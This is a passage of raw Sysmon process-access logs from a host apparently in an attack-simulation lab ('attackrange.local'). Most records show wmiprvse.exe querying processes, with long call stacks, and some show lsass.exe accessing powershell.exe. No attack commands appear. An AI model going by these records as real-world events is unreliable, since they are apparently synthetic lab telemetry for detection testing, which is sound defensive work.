16:54:43.514{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243170Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.514{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243169Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.514{05ADC7E1-229D-6039-0B00-00000000AD01}85216356C:\Windows\system32\lsass.exe{05ADC7E1-6DD3-603E-DCAA-00000000AD01}11576C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243168Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.514{05ADC7E1-229D-6039-0B00-00000000AD01}85216356C:\Windows\system32\lsass.exe{05ADC7E1-6DD3-603E-DCAA-00000000AD01}11576C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243167Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.514{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243166Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.514{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243165Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.514{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243164Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.514{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243163Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.514{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5A8B-603E-E3A7-00000000AD01}11288C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243162Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.514{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-CAA7-00000000AD01}15144C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243161Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.514{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-C9A7-00000000AD01}15528C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243160Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.514{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59C3-603E-C8A7-00000000AD01}15472C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243159Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.514{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59BE-603E-C3A7-00000000AD01}15012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243158Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.514{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002243157Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.514{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9A3817DA9F4902C4A5F84BE3692721A3,SHA256=0BFAE25941C49161DA3E472648F0E9FAD6C6E240F63D1D46B39DFAFD4A8896A4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002243156Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.514{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AC86-00000000AD01}7952C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243155Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.514{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AB86-00000000AD01}5896C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243154Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.498{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F281-00000000AD01}2992C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243153Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.498{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F181-00000000AD01}1592C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243152Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.498{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB2E-603C-9079-00000000AD01}4328C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243151Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.498{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\W